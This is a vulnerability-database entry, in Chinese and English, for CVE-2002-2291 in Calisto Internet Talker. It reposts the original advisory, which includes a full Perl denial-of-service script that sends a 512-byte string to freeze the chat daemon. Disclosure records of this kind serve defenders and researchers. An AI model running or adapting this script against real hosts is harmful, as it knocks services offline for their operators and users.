Calisto Internet Talker远程拒绝服务攻击漏洞

Calisto Internet Talker远程拒绝服务攻击漏洞

漏洞ID 1203591 漏洞类型 缓冲区溢出
发布时间 2002-11-25 更新时间 2002-12-31
图片[1]-Calisto Internet Talker远程拒绝服务攻击漏洞-安全小百科CVE编号 CVE-2002-2291
图片[2]-Calisto Internet Talker远程拒绝服务攻击漏洞-安全小百科CNNVD-ID CNNVD-200212-578
漏洞平台 N/A CVSS评分 7.8
|漏洞来源
https://cxsecurity.com/issue/WLB-2007100062
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-578
|漏洞详情
Calisto是一款允许多人使用telnet连接服务器进行聊天的程序。Calisto对带有超长数据的请求处理不正确,远程攻击者可以利用这个漏洞进行拒绝服务攻击。发送512字节或者更多数据请求给Calisto守护程序,可使系统停止运行,产生拒绝服务。需要手工重新启动获得正常服务。
|漏洞EXP


[=================================================================]
  [...............:[  S e c u r i t y F r e a k s  ]:...............]
  [.................:[  www.securityfreaks.com  ]:..................]
  [=================================================================]

Title         : Calisto Internet Talker Remote DOS
Risk          : Moderate
Software      : Calisto Internet Talker Version 0.04 and prior
Platforms     : Linux/Solaris/Cygwin
Vendor URL    : http://www.arcsite.de/hp/flibble/calisto/
Discovered by : subversive <subversive (at) linuxmail (dot) org [email concealed]>
Advisory ID   : SFAD02-002

.....:[ Overview :

Calisto is an Internet Talker that allows many people to use telnet
to connect to the server and chat. Calisto is coded in C and runs on
Linux/Solaris/Cygwin platforms. It is available on sourceforge as 
well as http://www.arcsite.de/hp/flibble/calisto/.

.....:[ Details :

By sending 512 bytes or more to the Calisto daemon it is possible to
freeze it, resulting in a denial of service. Calisto comes with an
autorun shell script that has been written for the sole purpose of 
automatically restarting Calisto should it crash but unfortunately
this vulnerability will not cause Calisto to crash and segfault but
rather freeze until manually restarted.

.....:[ Vendor Status :

Vendor contacted 1st/5th/10th November 2002 but did not respond.

.....:[ Solution :

Due to the nature of this bug it posses as more of an annoyance than a
major security threat. If your concerned with the problem then simply
disable Calisto until an updated version or patch has been released. 
Hopefully Calisto's vendors will take notice of this advisory and do 
something about the problem.

.....:[ Exploit - SF-talkischeap.pl :

#!/usr/bin/perl
#
# S e c u r i t y F r e a k s
#  www.securityfreaks.com
#
# Calisto Internet Talker Version 0.04 Remote Denial of Service
#
#
# This exploit will not cause Calisto to crash but rather cause it 
# to freeze until manually restarted. This actually works out better 
# because Calisto comes with an autorun script that would restart it 
# should it crash anyway.
#
# [ subversive[at]linuxmail.org ] - *31/10/2002*

use IO::Socket;

$data = "A";
$size = "512";
$freeze .= $data x $size;

while($_ = $ARGV[0], /^-/) {
    shift;       
    last if /^--$/;
    /^-h/ && do { $host = shift; };
    /^-p/ && do { $port = shift; };
}

if(!$host != 0) {

print <<"ACTIONSSPEAKLOUDERTHANWORDS";
   
   S e c u r i t y F r e a k s
     www.securityfreaks.com

SF-talkischeap.pl by subversive
   Calisto Internet Talker Version 0.04 Remote Denial of Service

Usage :  $0 -h <host> -p <port>

ACTIONSSPEAKLOUDERTHANWORDS
exit;

}

my $sock = new IO::Socket::INET ( Proto    => "tcp",
                                  PeerAddr => $host,
                                  PeerPort => $port,
                                );
die "nCould not connect to $host : $!n" unless $sock;

print $sock "$freeze";
close($sock);
exit;

-- 
______________________________________________
http://www.linuxmail.org/
Now with POP3/IMAP access for only US$19.95/yr

Powered by Outblaze
|参考资料

来源:BID
名称:6238
链接:http://www.securityfocus.com/bid/6238
来源:XF
名称:calisto-dos(10694)
链接:http://xforce.iss.net/xforce/xfdb/10694
来源:SREASON
名称:3241
链接:http://securityreason.com/securityalert/3241
来源:BUGTRAQ
名称:20021125SFAD02-002:CalistoInternetTalkerRemoteDOS
链接:http://online.securityfocus.com/archive/1/300986
来源:VULNWATCH
名称:20021125SFAD02-002:CalistoInternetTalkerRemoteDOS
链接:http://archives.neohapsis.com/archives/vulnwatch/2002-q4/0090.html
来源:NSFOCUS
名称:3905
链接:http://www.nsfocus.net/vulndb/3905

相关推荐: Microsoft Java Virtual Machine Multiple Vulnerabilities

Microsoft Java Virtual Machine Multiple Vulnerabilities 漏洞ID 1101114 漏洞类型 Unknown 发布时间 2002-12-12 更新时间 2002-12-12 CVE编号 N/A CNNVD-…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享